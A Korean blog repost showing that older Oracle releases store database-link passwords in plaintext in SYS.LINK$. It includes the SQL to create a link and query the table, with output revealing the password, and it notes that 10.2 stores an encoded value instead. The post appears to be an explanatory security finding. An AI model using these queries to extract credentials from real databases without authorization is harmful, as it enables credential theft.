[출처] http://cafe.naver.com/sec.cafe?iframe_url=/ArticleRead.nhn%3Farticleid=1137
SYS.LINK 취약점을 이용한 Oracle 패스워드 추출
SYS.Link$ stores password!
Version 10.1.0.2 (tested on 9i version also)
OS Windows (tested on Unix versions also)
1) DB link를 생성(다른 유저로 접속)
SQL> connect / as sysdba
Connected.
SQL> create public database link test connect to sac identified by arora using
2 'sac';
Database link created.
2) 이 테이블에 Select 할 수 있는 SYS 권한이 필요
SQL> desc sys.link$
Name Null? Type
----------------------------------------- -------- ----------------------------
OWNER# NOT NULL NUMBER
NAME NOT NULL VARCHAR2(128)
CTIME NOT NULL DATE
HOST VARCHAR2(2000)
USERID VARCHAR2(30)
PASSWORD VARCHAR2(30)
FLAG NUMBER
AUTHUSR VARCHAR2(30)
AUTHPWD VARCHAR2(30)
SQL> select name,userid,password from link$ where name='TEST';
NAME USERID PASSWORD
------------------------------ ---------- ------------------------------
TEST SAC ARORA
3) SAC 유저의 패스워드 암호화되지 않은 상태로 저장되어 있음
SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
PL/SQL Release 10.2.0.1.0 - Production
CORE 10.2.0.1.0 Production
TNS for 32-bit Windows: Version 10.2.0.1.0 - Production
NLSRTL Version 10.2.0.1.0 - Production
SQL> create database link ora10gr2db1 connect to scott identified by tiger using 'ora10gr2db1';
Database link created.
SQL> select userid,nvl(password,'unknown'),passwordx from sys.link$ where name='ORA10GR2DB1';
SCOTT unknown
05C3927784FDCD5589D74B88E1E1D4D777
'OraclE' 카테고리의 다른 글
| Oracle(오라클) [Technical Architecture] - Partition Table(파티션 테이블) [펌] (0) | 2010.02.17 |
|---|---|
| dbms_metadata (0) | 2010.02.09 |
| V$FLASHBACK_DATABASE_LOG [펌] (0) | 2010.02.05 |
| Rollback Segment 삭제 [펌] (0) | 2010.02.05 |
| Managing Rollback Segments [펌] (0) | 2010.02.05 |